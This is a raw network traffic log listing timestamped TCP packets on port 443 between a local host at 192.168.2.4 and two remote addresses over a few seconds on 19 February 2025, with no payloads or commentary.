Feb 19, 2025 20:56:17.566251993 CET	443	49751	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.566356897 CET	49751	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.566745043 CET	49751	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.566771984 CET	443	49751	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.645538092 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.645766973 CET	49748	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.645804882 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.647485971 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.647567987 CET	49748	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.648802996 CET	49748	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.648895979 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.648963928 CET	49748	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.691373110 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.701176882 CET	49748	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.701195955 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.747097969 CET	49748	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.931368113 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.931757927 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.931781054 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.935308933 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.935406923 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.936022043 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.936206102 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.936656952 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.936674118 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.950018883 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.950154066 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.950252056 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.950264931 CET	49748	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.950294018 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.950402975 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.950413942 CET	49748	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.950429916 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.950484037 CET	49748	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.950504065 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.952428102 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.952510118 CET	49748	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.952769041 CET	49748	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.952786922 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.979557037 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.005594969 CET	443	49750	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.005877018 CET	49750	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.005909920 CET	443	49750	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.006791115 CET	443	49750	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.006859064 CET	49750	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.007266998 CET	49750	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.007334948 CET	443	49750	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.007451057 CET	49750	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.051331997 CET	443	49750	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.072540998 CET	49750	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.072567940 CET	443	49750	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.119400978 CET	49750	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.200925112 CET	443	49751	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.201683998 CET	49751	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.201704979 CET	443	49751	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.203150034 CET	443	49751	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.203233957 CET	49751	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.207776070 CET	49751	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.208034992 CET	443	49751	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.240880013 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.241041899 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.241108894 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.241132021 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.241163015 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.241214991 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.241250992 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.241401911 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.241457939 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.241472006 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.241539955 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.241592884 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.241600990 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.246537924 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.246599913 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.246608019 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.260756969 CET	49751	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.260772943 CET	443	49751	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.292028904 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.307646990 CET	49751	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.309617996 CET	443	49750	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.310610056 CET	443	49750	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.310683966 CET	49750	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.312510014 CET	49750	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.312555075 CET	443	49750	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.326255083 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.327308893 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.327409983 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.327430964 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.329263926 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.329360962 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.329377890 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.335549116 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.335624933 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.335639954 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.341810942 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.341922045 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.341938019 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.348042965 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.348149061 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.348164082 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.354101896 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.354166985 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.354195118 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.360085964 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.360167027 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.360188007 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.365966082 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.366125107 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.366133928 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.371845007 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.371908903 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.371915102 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.379391909 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.379458904 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.379467964 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.414469957 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.414556026 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.414622068 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.414732933 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.414822102 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.414858103 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.414879084 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.414927959 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.414946079 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.415038109 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.415103912 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.415117979 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.420932055 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.421015978 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.421016932 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.421049118 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.421103954 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.427107096 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.432828903 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.432900906 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.432909012 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.432934046 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.432996988 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.438935041 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.446372986 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.446445942 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.446470976 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.470361948 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.470423937 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.470449924 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.486634016 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.486715078 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.486718893 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.486743927 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.486910105 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.496128082 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.503042936 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.503106117 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.503127098 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.517627954 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.517707109 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.517719030 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.517745972 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.517796993 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.521869898 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.524760962 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.524805069 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.524816036 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.524833918 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.524967909 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.528146982 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.558902979 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.558952093 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.559005022 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.559037924 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.559045076 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.559068918 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.559082985 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.559413910 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.559452057 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.559492111 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.559534073 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.559578896 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.559578896 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.559649944 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.559710979 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.560336113 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.560405016 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.560412884 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.560429096 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.560473919 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.560492992 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.561328888 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.561367989 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.561400890 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.561408043 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.561420918 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.561475039 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.561490059 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.562087059 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.562297106 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.562424898 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.562459946 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.562473059 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.562489033 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.562630892 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.563381910 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.563445091 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.563502073 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.563524961 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.563538074 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.563565969 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.564374924 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.564424992 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.564441919 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.564456940 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.564507008 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.564521074 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.565414906 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:18.565478086 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.565660000 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:18.565687895 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:20.660624981 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:20.660650969 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:20.660757065 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:20.660952091 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:20.660959959 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.434182882 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.438822985 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.438837051 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.440547943 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.440610886 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.442491055 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.442583084 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.442698002 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.487329006 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.494829893 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.494842052 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.557301998 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.704673052 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.704777956 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.704830885 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.704843998 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.704951048 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.704998016 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.705003023 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.710386992 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.710499048 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.710555077 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.710566044 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.710613966 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.710618019 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.716830969 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.719319105 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.719330072 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.761424065 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.761439085 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.795754910 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.795862913 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.795953989 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.796019077 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.796044111 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.796056986 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.800307989 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.800390959 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.800411940 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.806112051 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.806267977 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.806351900 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.806358099 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.806427956 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.812629938 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.819066048 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.819145918 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.819150925 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.825306892 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.825398922 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.825469017 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.825474024 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.825516939 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.833081007 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.837007999 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.837090969 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.837114096 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.837120056 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.837162018 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.845916033 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.857844114 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.857892990 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.857933044 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.857964039 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.857986927 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.858015060 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.887090921 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.887166977 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.887239933 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.887258053 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.887285948 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.887337923 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.887491941 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.887676001 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.887739897 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.887749910 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.887806892 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.887810946 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.888430119 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.891383886 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.891388893 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.894644022 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.895373106 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.895379066 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.898132086 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.898217916 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.898222923 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.902169943 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.903067112 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.903089046 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.907516003 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.908935070 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.908941031 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.912843943 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.915005922 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.915013075 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.918169022 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.918241024 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.918248892 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.923553944 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.927380085 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.927386045 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.928791046 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.931376934 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.931381941 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.933867931 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.935035944 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.935040951 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.938316107 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.939295053 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.939300060 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.942964077 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.943382025 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.943388939 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.947288990 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.947376013 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.947381020 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.951543093 CET	443	49760	142.250.186.78	192.168.2.4
